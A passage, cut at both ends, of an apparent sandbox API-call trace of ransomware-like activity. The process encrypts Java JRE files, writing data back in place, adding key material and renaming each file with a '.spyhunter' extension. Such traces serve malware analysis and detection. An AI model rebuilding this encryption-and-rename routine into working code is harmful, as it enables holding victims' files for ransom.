cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_LinkDrop32x32.gif.spyhunter") returned 89 [0125.301] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_LinkDrop32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_linkdrop32x32.gif"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_LinkDrop32x32.gif.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_linkdrop32x32.gif.spyhunter")) returned 1 [0125.302] GetProcessHeap () returned 0x2c0000 [0125.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0125.302] GetProcessHeap () returned 0x2c0000 [0125.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0125.302] GetProcessHeap () returned 0x2c0000 [0125.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eea640 | out: hHeap=0x2c0000) returned 1 [0125.302] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f7f8 | out: pbBuffer=0x57f7f8) returned 1 [0125.302] GetProcessHeap () returned 0x2c0000 [0125.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0125.302] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f7f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f7f0*=0x30) returned 1 [0125.302] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_copynodrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.306] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 81 [0125.306] StrStrW (lpFirst="win32_CopyNoDrop32x32.gif", lpSrch=".txt") returned 0x0 [0125.306] GetProcessHeap () returned 0x2c0000 [0125.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0125.306] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f7b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f7b4*=0x99, lpOverlapped=0x0) returned 1 [0125.307] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff67, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.307] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x99, lpNumberOfBytesWritten=0x57f7b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f7b4*=0x99, lpOverlapped=0x0) returned 1 [0125.307] GetProcessHeap () returned 0x2c0000 [0125.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0125.307] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.307] WriteFile (in: hFile=0x170, lpBuffer=0x57f7f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f7b4, lpOverlapped=0x0 | out: lpBuffer=0x57f7f4*, lpNumberOfBytesWritten=0x57f7b4*=0x4, lpOverlapped=0x0) returned 1 [0125.307] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f7b4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f7b4*=0x30, lpOverlapped=0x0) returned 1 [0125.307] CloseHandle (hObject=0x170) returned 1 [0125.307] GetProcessHeap () returned 0x2c0000 [0125.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0125.307] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif.spyhunter") returned 91 [0125.307] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_copynodrop32x32.gif"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_copynodrop32x32.gif.spyhunter")) returned 1 [0125.308] GetProcessHeap () returned 0x2c0000 [0125.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0125.308] GetProcessHeap () returned 0x2c0000 [0125.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0125.308] GetProcessHeap () returned 0x2c0000 [0125.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa000 | out: hHeap=0x2c0000) returned 1 [0125.308] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f7f0 | out: pbBuffer=0x57f7f0) returned 1 [0125.308] GetProcessHeap () returned 0x2c0000 [0125.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0125.308] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f7e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f7e8*=0x30) returned 1 [0125.309] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_CopyDrop32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_copydrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.310] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_CopyDrop32x32.gif") returned 79 [0125.310] StrStrW (lpFirst="win32_CopyDrop32x32.gif", lpSrch=".txt") returned 0x0 [0125.310] GetProcessHeap () returned 0x2c0000 [0125.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0125.310] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f7ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f7ac*=0xa5, lpOverlapped=0x0) returned 1 [0125.311] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff5b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.311] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xa5, lpNumberOfBytesWritten=0x57f7ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f7ac*=0xa5, lpOverlapped=0x0) returned 1 [0125.311] GetProcessHeap () returned 0x2c0000 [0125.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0125.311] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.311] WriteFile (in: hFile=0x170, lpBuffer=0x57f7ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f7ac, lpOverlapped=0x0 | out: lpBuffer=0x57f7ec*, lpNumberOfBytesWritten=0x57f7ac*=0x4, lpOverlapped=0x0) returned 1 [0125.312] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f7ac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f7ac*=0x30, lpOverlapped=0x0) returned 1 [0125.312] CloseHandle (hObject=0x170) returned 1 [0125.312] GetProcessHeap () returned 0x2c0000 [0125.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0125.312] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_CopyDrop32x32.gif.spyhunter") returned 89 [0125.312] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_CopyDrop32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_copydrop32x32.gif"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\win32_CopyDrop32x32.gif.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\win32_copydrop32x32.gif.spyhunter")) returned 1 [0125.313] GetProcessHeap () returned 0x2c0000 [0125.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0125.313] GetProcessHeap () returned 0x2c0000 [0125.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0125.313] GetProcessHeap () returned 0x2c0000 [0125.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eea558 | out: hHeap=0x2c0000) returned 1 [0125.313] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f7f0 | out: pbBuffer=0x57f7f0) returned 1 [0125.313] GetProcessHeap () returned 0x2c0000 [0125.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0125.313] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f7e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f7e8*=0x30) returned 1 [0125.313] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\invalid32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\invalid32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.314] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\invalid32x32.gif") returned 72 [0125.314] StrStrW (lpFirst="invalid32x32.gif", lpSrch=".txt") returned 0x0 [0125.314] GetProcessHeap () returned 0x2c0000 [0125.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0125.314] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f7ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f7ac*=0x99, lpOverlapped=0x0) returned 1 [0125.314] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff67, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.315] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x99, lpNumberOfBytesWritten=0x57f7ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f7ac*=0x99, lpOverlapped=0x0) returned 1 [0125.315] GetProcessHeap () returned 0x2c0000 [0125.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0125.315] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.315] WriteFile (in: hFile=0x170, lpBuffer=0x57f7ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f7ac, lpOverlapped=0x0 | out: lpBuffer=0x57f7ec*, lpNumberOfBytesWritten=0x57f7ac*=0x4, lpOverlapped=0x0) returned 1 [0125.315] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f7ac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f7ac*=0x30, lpOverlapped=0x0) returned 1 [0125.315] CloseHandle (hObject=0x170) returned 1 [0125.315] GetProcessHeap () returned 0x2c0000 [0125.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0125.315] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\invalid32x32.gif.spyhunter") returned 82 [0125.315] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\invalid32x32.gif" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\invalid32x32.gif"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\invalid32x32.gif.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\invalid32x32.gif.spyhunter")) returned 1 [0125.316] GetProcessHeap () returned 0x2c0000 [0125.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0125.316] GetProcessHeap () returned 0x2c0000 [0125.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0125.316] GetProcessHeap () returned 0x2c0000 [0125.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee4ef0 | out: hHeap=0x2c0000) returned 1 [0125.317] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f7e8 | out: pbBuffer=0x57f7e8) returned 1 [0125.317] GetProcessHeap () returned 0x2c0000 [0125.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0125.320] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f7e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f7e0*=0x30) returned 1 [0125.320] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\cursors.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\cursors.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.321] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\cursors.properties") returned 74 [0125.321] StrStrW (lpFirst="cursors.properties", lpSrch=".txt") returned 0x0 [0125.321] GetProcessHeap () returned 0x2c0000 [0125.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0125.321] ReadFile (in: hFile=0x170, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f7a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f7a4*=0x500, lpOverlapped=0x0) returned 1 [0125.322] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffb00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.322] WriteFile (in: hFile=0x170, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x57f7a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f7a4*=0x500, lpOverlapped=0x0) returned 1 [0125.322] GetProcessHeap () returned 0x2c0000 [0125.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0125.322] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.322] WriteFile (in: hFile=0x170, lpBuffer=0x57f7e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f7a4, lpOverlapped=0x0 | out: lpBuffer=0x57f7e4*, lpNumberOfBytesWritten=0x57f7a4*=0x4, lpOverlapped=0x0) returned 1 [0125.322] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f7a4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f7a4*=0x30, lpOverlapped=0x0) returned 1 [0125.322] CloseHandle (hObject=0x170) returned 1 [0125.322] GetProcessHeap () returned 0x2c0000 [0125.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0125.323] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\cursors.properties.spyhunter") returned 84 [0125.323] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\cursors.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\cursors.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\cursors.properties.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\cursors.properties.spyhunter")) returned 1 [0125.323] GetProcessHeap () returned 0x2c0000 [0125.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0125.323] GetProcessHeap () returned 0x2c0000 [0125.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0125.323] GetProcessHeap () returned 0x2c0000 [0125.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee4e10 | out: hHeap=0x2c0000) returned 1 [0125.324] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f7e8 | out: pbBuffer=0x57f7e8) returned 1 [0125.324] GetProcessHeap () returned 0x2c0000 [0125.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0125.324] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f7e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f7e0*=0x30) returned 1 [0125.324] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaSansDemiBold.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidasansdemibold.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.324] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaSansDemiBold.ttf") returned 69 [0125.324] StrStrW (lpFirst="LucidaSansDemiBold.ttf", lpSrch=".txt") returned 0x0 [0125.324] GetProcessHeap () returned 0x2c0000 [0125.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0125.324] ReadFile (in: hFile=0x170, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f7a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f7a4*=0x2800, lpOverlapped=0x0) returned 1 [0125.356] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.356] WriteFile (in: hFile=0x170, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f7a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f7a4*=0x2800, lpOverlapped=0x0) returned 1 [0125.356] GetProcessHeap () returned 0x2c0000 [0125.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0125.356] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.356] WriteFile (in: hFile=0x170, lpBuffer=0x57f7e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f7a4, lpOverlapped=0x0 | out: lpBuffer=0x57f7e4*, lpNumberOfBytesWritten=0x57f7a4*=0x4, lpOverlapped=0x0) returned 1 [0125.440] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f7a4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f7a4*=0x30, lpOverlapped=0x0) returned 1 [0125.440] CloseHandle (hObject=0x170) returned 1 [0125.468] GetProcessHeap () returned 0x2c0000 [0125.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0125.468] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaSansDemiBold.ttf.spyhunter") returned 79 [0125.468] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaSansDemiBold.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidasansdemibold.ttf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaSansDemiBold.ttf.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidasansdemibold.ttf.spyhunter")) returned 1 [0125.469] GetProcessHeap () returned 0x2c0000 [0125.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0125.469] GetProcessHeap () returned 0x2c0000 [0125.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0125.469] GetProcessHeap () returned 0x2c0000 [0125.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7ce88 | out: hHeap=0x2c0000) returned 1 [0125.469] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f7e0 | out: pbBuffer=0x57f7e0) returned 1 [0125.469] GetProcessHeap () returned 0x2c0000 [0125.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0125.470] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f7d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f7d8*=0x30) returned 1 [0125.470] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\psfontj2d.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\psfontj2d.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.471] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\psfontj2d.properties") returned 61 [0125.471] StrStrW (lpFirst="psfontj2d.properties", lpSrch=".txt") returned 0x0 [0125.471] GetProcessHeap () returned 0x2c0000 [0125.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.471] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f79c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f79c*=0x2800, lpOverlapped=0x0) returned 1 [0125.474] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.474] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f79c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f79c*=0x2800, lpOverlapped=0x0) returned 1 [0125.474] GetProcessHeap () returned 0x2c0000 [0125.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.474] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.474] WriteFile (in: hFile=0x170, lpBuffer=0x57f7dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f79c, lpOverlapped=0x0 | out: lpBuffer=0x57f7dc*, lpNumberOfBytesWritten=0x57f79c*=0x4, lpOverlapped=0x0) returned 1 [0125.475] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f79c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f79c*=0x30, lpOverlapped=0x0) returned 1 [0125.475] CloseHandle (hObject=0x170) returned 1 [0125.475] GetProcessHeap () returned 0x2c0000 [0125.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0125.475] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\psfontj2d.properties.spyhunter") returned 71 [0125.475] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\psfontj2d.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\psfontj2d.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\psfontj2d.properties.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\psfontj2d.properties.spyhunter")) returned 1 [0125.476] GetProcessHeap () returned 0x2c0000 [0125.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0125.476] GetProcessHeap () returned 0x2c0000 [0125.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0125.476] GetProcessHeap () returned 0x2c0000 [0125.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbff88 | out: hHeap=0x2c0000) returned 1 [0125.476] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f7e0 | out: pbBuffer=0x57f7e0) returned 1 [0125.477] GetProcessHeap () returned 0x2c0000 [0125.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0125.477] CryptEncrypt (in: hKey=0x2d4db8, 